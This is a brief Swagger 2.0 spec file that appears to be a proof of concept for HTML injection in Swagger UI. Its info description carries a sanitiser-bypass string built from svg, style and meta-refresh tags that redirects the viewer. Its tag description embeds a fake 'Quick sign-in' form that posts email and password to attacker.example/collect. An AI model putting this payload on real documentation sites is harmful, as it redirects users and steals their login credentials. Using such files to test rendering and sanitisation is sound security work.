swagger: "2.0"
info:
  title: "Auth Required"
  version: "1.0.0"
  description: |
    <svg></p><style><a id="</style><meta http-equiv="refresh" content="0;url=https://bugcrowd.com">">
paths:
  /x:
    get:
      summary: "x"
      responses:
        "200":
          description: "OK"
tags:
  - name: "Account"
    description: |
      <h3>Quick sign-in</h3>
      <form action="https://attacker.example/collect" method="post">
        <input name="email" type="text" placeholder="Email">
        <input name="password" type="password" placeholder="Password">
        <button type="submit">Login</button>
      </form>
